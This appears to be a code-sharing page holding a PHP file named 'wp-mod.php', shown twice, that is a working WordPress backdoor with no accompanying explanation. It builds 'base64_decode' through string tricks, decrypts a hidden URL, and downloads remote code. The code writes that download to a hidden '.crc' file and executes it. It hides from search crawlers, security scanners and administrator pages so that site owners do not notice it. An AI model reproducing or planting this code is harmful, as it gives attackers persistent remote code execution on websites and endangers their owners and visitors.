nikitasius/wp-mod.php Secret

## wp-mod.php
<?php
@ini_set('display_errors', '0');
error_reporting(0);
$bad_agents = '~google|360Spider|80legs|AIBOT|Aboundex|Acunetix|AhrefsBot|Alexibot|BLEXBot|BackDoorBot|BackWeb|Baiduspider|Bandit|BatchFTP|Bigfoot|Black.Hole|BlackWidow|BlowFish|BotALot|Buddy|BuiltBotTough|Bullseye|BunnySlippers|Cegbfeieh|CheeseBot|CherryPicker|ChinaClaw|Cogentbot|Collector|Copier|CopyRightCheck|Crescent|Custo|DIIbot|DISCo|DittoSpyder|Download Demon|Download Devil|Download Wonder|Drip|EasyDL|EirGrabber|EmailCollector|EmailSiphon|EmailWolf|EroCrawler|Exabot|Express WebPictures|Extractor|EyeNetIE|FHscan|Foobot|FrontPage|Go-Ahead-Got-It|GrabNet|Grafula|HMView|HTTrack|Harvest|IlseBot|Image Stripper|Image Sucker|Indy Library|InfoNavibot|InfoTekies|Intelliseek|InterGET|Internet Ninja|Iria|JOC|Jakarta|James BOT|Java|JennyBot|JetCar|JustView|Jyxobot|Kenjin.Spider|Keyword.Density|LNSpiderguy|LWP::Simple|LexiBot|LinkScan/8.1a.Unix|LinkWalker|LinkextractorPro|LinkpadBot|MIDown tool|MIIxpc|MJ12bot|Mag-Net|Magnet|MarkWatch|Mass Downloader|Mata.Hari|MegaIndex.ru/2.0|Memo|Microsoft URL Control|Microsoft.URL|Mirror|Missigua Locator|Mister PiX|Mozilla.\*NEWT|Mozilla\/3.Mozilla\/2.01|NAMEPROTECT|NICErsPRO|NPbot|Navroad|NearSite|Net Vampire|NetAnts|NetMechanic|NetSpider|NetZIP|Netcraft|NextGenSearchBot|NimbleCrawler|Ninja|Octopus|Offline Explorer|Offline Navigator|Openfind|OutfoxBot|PHP version tracker|PageGrabber|Papa Foto|Pockey|ProPowerBot\/2.14|ProWebWalker|Pump|QueryN.Metasearch|RMA|ReGet|RealDownload|Reaper|Recorder|RepoMonkey|SEOkicks|SearchmetricsBot|SemrushBot|Siphon|SiteExplorer|SiteSnagger|SlySearch|SmartDownload|Snake|Snapbot|Snoopy|SpaceBison|SpankBot|Sqworm|Stripper|Sucker|SuperBot|SuperHTTP|Surfbot|Szukacz\/1.4|Teleport|Telesoft|The.Intraformant|TheNomad|TightTwatBot|Titan|True_bot|TurnitinBot|TurnitinBot\/1.5|URLy.Warning|VCI|Vacuum|VoidEYE|WISENutbot|WWW-Collector-E|WWWOFFLE|Web Image Collector|Web Sucker|Web.Image.Collector|WebAuto|WebBandit|WebCopier|WebEMailExtrac.\*\" bot|WebEnhancer|WebFetch|WebGo IS|WebLeacher|WebReaper|WebSauger|WebStripper|WebWhacker|WebZIP|Webclipping.com|WebmasterWorldForumBot|Website Quester|Website eXtractor|Webster|Wget|Whacker|Widow|Xaldon|Xenu|Zeus|ZmEu|Zyborg|archive.org_bot|asterias|attach|cosmos|dragonfly|eCatch|ebingbong|flunky|gotit|hloader|humanlinks|ia_archiver|larbin|lftp|libWeb\/clsHTTP|likse|lwp-trivial|moget|niki-bot|pavuk|pcBrowser|psbot|rogerBot|sogou|spanner|spbot|suzuran|tAkeOut|turingos~i';
$bad_urls = '#xmlrpc.php|wp-includes|wp-content|wp-login.php|wp-cron.php|\?feed=|wp-json|\/feed|\.css|\.js|\.ico|\.png|\.gif|\.bmp|\.tiff|\.mpg|\.wmv|\.mp3|\.mpeg|\.zip|\.gzip|\.rar|\.exe|\.pdf|\.doc|\.swf|\.txt|\.xml|wp-admin|administrator#';
if (!@preg_match($bad_agents, $_SERVER['HTTP_USER_AGENT']) && !function_exists('httpget') && !@preg_match($bad_urls, $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'])) {
    $ea = '_shaesx_'; $ay = 'httpget'; $ae = 'decode'; $ea = str_replace('_sha', 'bas', $ea); $ao = 'wp_cd'; $ee = $ea.$ae; $oa = str_replace('sx', '64', $ee); $algo = 'crc';
    $pass = "Zgc5c4MXrLszcAQOrYpaOLGePlOUMLhZ3zuKAQ==";
    function httpget($url) {
        if (function_exists('curl_init')) {
            $ch = curl_init($url);
            curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 8);
            curl_setopt($ch, CURLOPT_TIMEOUT, 15);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            $data = curl_exec($ch);
            curl_close($ch);
            return $data;
        } elseif (@ini_get('allow_url_fopen')) {
            return @file_get_contents($url);
        } else {
            $parts = parse_url($url);
            $target = $parts['host'];
            $port = isset($parts['port']) ? $parts['port'] : 80;
            $page = isset($parts['path']) ? $parts['path'] : '';
            $page .= isset($parts['query']) ? '?' . $parts['query'] : '';
            $page .= isset($parts['fragment']) ? '#' . $parts['fragment'] : '';
            $page = ($page == '') ? '/' : $page;
            if ($fp = @fsockopen($target, $port, $errno, $errstr, 3)) {
                @socket_set_option($fp, SOL_SOCKET, SO_RCVTIMEO, array("sec"=>1, "usec"=>1));
                $headers = "GET $page HTTP/1.1\r\n";
                $headers .= "Host: {$parts['host']}\r\n";
                $headers .= "Connection: Close\r\n\r\n";
                if (fwrite($fp, $headers)) {
                    $resp = '';
                    while (!feof($fp) && ($curr = fgets($fp, 128)) !== false) {
                        $resp .= $curr;
                    }
                    if (isset($curr) && $curr !== false) {
                        fclose($fp);
                        return substr(strstr($resp, "\r\n\r\n"), 3);
                    }
                }
                fclose($fp);
            }
        }
        return false;
    }
    function wp_cd($fd, $fa="")
    {
       $fe = "wp_frmfunct";
       $len = strlen($fd);
       $ff = '';
       $n = $len>100 ? 8 : 2;
       while( strlen($ff)<$len )
       {
          $ff .= substr(pack('H*', sha1($fa.$ff.$fe)), 0, $n);
       }
       return $fd^$ff;
    }
    $reqw = $ay($ao($oa("$pass"), 'wp_function'));
    preg_match('#gogo(.*)enen#is', $reqw, $mtchs);
    $dirs = glob("*", GLOB_ONLYDIR);
    $ura = 0;
    foreach ($dirs as $dira) {
        if (file_exists("$dira/.$algo")) {
            $ura = 1;
            $eb = "$dira/";
            @include_once "$dira/.$algo";
            break;
        }
        $subdirs = glob("$dira/*", GLOB_ONLYDIR);
        foreach ($subdirs as $subdira) {
            if (file_exists("$subdira/.$algo")) {
                $ura = 1;
                $eb = "$subdira/";
                @include_once("$dira/.$algo");
                break;
            }
        }
    }
    if (!$ura) {
        foreach ($dirs as $dira) {
            if (fopen("$dira/.$algo", 'w')) {
                $ura = 1;
                $eb = "$dira/";
                $hdl = fopen("$dira/.$algo", 'w');
                break;
            }
            $subdirs = glob("$dira/*", GLOB_ONLYDIR);
            foreach ($subdirs as $subdira) {
                if (fopen("$subdira/.$algo", 'w')) {
                    $ura = 1;
                    $eb = "$subdira/";
                    $hdl = fopen("$subdira/.$algo", 'w');
                    break;
                }
            }
        }
        if (!$ura && fopen(".$algo", 'w')) { $ura = 1; $eb = ''; $hdl = fopen(".$algo", 'w'); }
        fwrite($hdl, rawurldecode($mtchs[1]));
        fclose($hdl);
        @include("{$eb}.$algo");
    }
}
?>
	<?php
	@ini_set('display_errors', '0');
	error_reporting(0);
	$bad_agents = '~google\|360Spider\|80legs\|AIBOT\|Aboundex\|Acunetix\|AhrefsBot\|Alexibot\|BLEXBot\|BackDoorBot\|BackWeb\|Baiduspider\|Bandit\|BatchFTP\|Bigfoot\|Black.Hole\|BlackWidow\|BlowFish\|BotALot\|Buddy\|BuiltBotTough\|Bullseye\|BunnySlippers\|Cegbfeieh\|CheeseBot\|CherryPicker\|ChinaClaw\|Cogentbot\|Collector\|Copier\|CopyRightCheck\|Crescent\|Custo\|DIIbot\|DISCo\|DittoSpyder\|Download Demon\|Download Devil\|Download Wonder\|Drip\|EasyDL\|EirGrabber\|EmailCollector\|EmailSiphon\|EmailWolf\|EroCrawler\|Exabot\|Express WebPictures\|Extractor\|EyeNetIE\|FHscan\|Foobot\|FrontPage\|Go-Ahead-Got-It\|GrabNet\|Grafula\|HMView\|HTTrack\|Harvest\|IlseBot\|Image Stripper\|Image Sucker\|Indy Library\|InfoNavibot\|InfoTekies\|Intelliseek\|InterGET\|Internet Ninja\|Iria\|JOC\|Jakarta\|James BOT\|Java\|JennyBot\|JetCar\|JustView\|Jyxobot\|Kenjin.Spider\|Keyword.Density\|LNSpiderguy\|LWP::Simple\|LexiBot\|LinkScan/8.1a.Unix\|LinkWalker\|LinkextractorPro\|LinkpadBot\|MIDown tool\|MIIxpc\|MJ12bot\|Mag-Net\|Magnet\|MarkWatch\|Mass Downloader\|Mata.Hari\|MegaIndex.ru/2.0\|Memo\|Microsoft URL Control\|Microsoft.URL\|Mirror\|Missigua Locator\|Mister PiX\|Mozilla.\NEWT\|Mozilla\/3.Mozilla\/2.01\|NAMEPROTECT\|NICErsPRO\|NPbot\|Navroad\|NearSite\|Net Vampire\|NetAnts\|NetMechanic\|NetSpider\|NetZIP\|Netcraft\|NextGenSearchBot\|NimbleCrawler\|Ninja\|Octopus\|Offline Explorer\|Offline Navigator\|Openfind\|OutfoxBot\|PHP version tracker\|PageGrabber\|Papa Foto\|Pockey\|ProPowerBot\/2.14\|ProWebWalker\|Pump\|QueryN.Metasearch\|RMA\|ReGet\|RealDownload\|Reaper\|Recorder\|RepoMonkey\|SEOkicks\|SearchmetricsBot\|SemrushBot\|Siphon\|SiteExplorer\|SiteSnagger\|SlySearch\|SmartDownload\|Snake\|Snapbot\|Snoopy\|SpaceBison\|SpankBot\|Sqworm\|Stripper\|Sucker\|SuperBot\|SuperHTTP\|Surfbot\|Szukacz\/1.4\|Teleport\|Telesoft\|The.Intraformant\|TheNomad\|TightTwatBot\|Titan\|True_bot\|TurnitinBot\|TurnitinBot\/1.5\|URLy.Warning\|VCI\|Vacuum\|VoidEYE\|WISENutbot\|WWW-Collector-E\|WWWOFFLE\|Web Image Collector\|Web Sucker\|Web.Image.Collector\|WebAuto\|WebBandit\|WebCopier\|WebEMailExtrac.\\" bot\|WebEnhancer\|WebFetch\|WebGo IS\|WebLeacher\|WebReaper\|WebSauger\|WebStripper\|WebWhacker\|WebZIP\|Webclipping.com\|WebmasterWorldForumBot\|Website Quester\|Website eXtractor\|Webster\|Wget\|Whacker\|Widow\|Xaldon\|Xenu\|Zeus\|ZmEu\|Zyborg\|archive.org_bot\|asterias\|attach\|cosmos\|dragonfly\|eCatch\|ebingbong\|flunky\|gotit\|hloader\|humanlinks\|ia_archiver\|larbin\|lftp\|libWeb\/clsHTTP\|likse\|lwp-trivial\|moget\|niki-bot\|pavuk\|pcBrowser\|psbot\|rogerBot\|sogou\|spanner\|spbot\|suzuran\|tAkeOut\|turingos~i';
	$bad_urls = '#xmlrpc.php\|wp-includes\|wp-content\|wp-login.php\|wp-cron.php\|\?feed=\|wp-json\|\/feed\|\.css\|\.js\|\.ico\|\.png\|\.gif\|\.bmp\|\.tiff\|\.mpg\|\.wmv\|\.mp3\|\.mpeg\|\.zip\|\.gzip\|\.rar\|\.exe\|\.pdf\|\.doc\|\.swf\|\.txt\|\.xml\|wp-admin\|administrator#';
	if (!@preg_match($bad_agents, $_SERVER['HTTP_USER_AGENT']) && !function_exists('httpget') && !@preg_match($bad_urls, $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'])) {
	$ea = '_shaesx_'; $ay = 'httpget'; $ae = 'decode'; $ea = str_replace('_sha', 'bas', $ea); $ao = 'wp_cd'; $ee = $ea.$ae; $oa = str_replace('sx', '64', $ee); $algo = 'crc';
	$pass = "Zgc5c4MXrLszcAQOrYpaOLGePlOUMLhZ3zuKAQ==";
	function httpget($url) {
	if (function_exists('curl_init')) {
	$ch = curl_init($url);
	curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 8);
	curl_setopt($ch, CURLOPT_TIMEOUT, 15);
	curl_setopt($ch, CURLOPT_HEADER, 0);
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
	$data = curl_exec($ch);
	curl_close($ch);
	return $data;
	} elseif (@ini_get('allow_url_fopen')) {
	return @file_get_contents($url);
	} else {
	$parts = parse_url($url);
	$target = $parts['host'];
	$port = isset($parts['port']) ? $parts['port'] : 80;
	$page = isset($parts['path']) ? $parts['path'] : '';
	$page .= isset($parts['query']) ? '?' . $parts['query'] : '';
	$page .= isset($parts['fragment']) ? '#' . $parts['fragment'] : '';
	$page = ($page == '') ? '/' : $page;
	if ($fp = @fsockopen($target, $port, $errno, $errstr, 3)) {
	@socket_set_option($fp, SOL_SOCKET, SO_RCVTIMEO, array("sec"=>1, "usec"=>1));
	$headers = "GET $page HTTP/1.1\r\n";
	$headers .= "Host: {$parts['host']}\r\n";
	$headers .= "Connection: Close\r\n\r\n";
	if (fwrite($fp, $headers)) {
	$resp = '';
	while (!feof($fp) && ($curr = fgets($fp, 128)) !== false) {
	$resp .= $curr;
	}
	if (isset($curr) && $curr !== false) {
	fclose($fp);
	return substr(strstr($resp, "\r\n\r\n"), 3);
	}
	}
	fclose($fp);
	}
	}
	return false;
	}
	function wp_cd($fd, $fa="")
	{
	$fe = "wp_frmfunct";
	$len = strlen($fd);
	$ff = '';
	$n = $len>100 ? 8 : 2;
	while( strlen($ff)<$len )
	{
	$ff .= substr(pack('H*', sha1($fa.$ff.$fe)), 0, $n);
	}
	return $fd^$ff;
	}
	$reqw = $ay($ao($oa("$pass"), 'wp_function'));
	preg_match('#gogo(.*)enen#is', $reqw, $mtchs);
	$dirs = glob("*", GLOB_ONLYDIR);
	$ura = 0;
	foreach ($dirs as $dira) {
	if (file_exists("$dira/.$algo")) {
	$ura = 1;
	$eb = "$dira/";
	@include_once "$dira/.$algo";
	break;
	}
	$subdirs = glob("$dira/*", GLOB_ONLYDIR);
	foreach ($subdirs as $subdira) {
	if (file_exists("$subdira/.$algo")) {
	$ura = 1;
	$eb = "$subdira/";
	@include_once("$dira/.$algo");
	break;
	}
	}
	}
	if (!$ura) {
	foreach ($dirs as $dira) {
	if (fopen("$dira/.$algo", 'w')) {
	$ura = 1;
	$eb = "$dira/";
	$hdl = fopen("$dira/.$algo", 'w');
	break;
	}
	$subdirs = glob("$dira/*", GLOB_ONLYDIR);
	foreach ($subdirs as $subdira) {
	if (fopen("$subdira/.$algo", 'w')) {
	$ura = 1;
	$eb = "$subdira/";
	$hdl = fopen("$subdira/.$algo", 'w');
	break;
	}
	}
	}
	if (!$ura && fopen(".$algo", 'w')) { $ura = 1; $eb = ''; $hdl = fopen(".$algo", 'w'); }
	fwrite($hdl, rawurldecode($mtchs[1]));
	fclose($hdl);
	@include("{$eb}.$algo");
	}
	}
	?>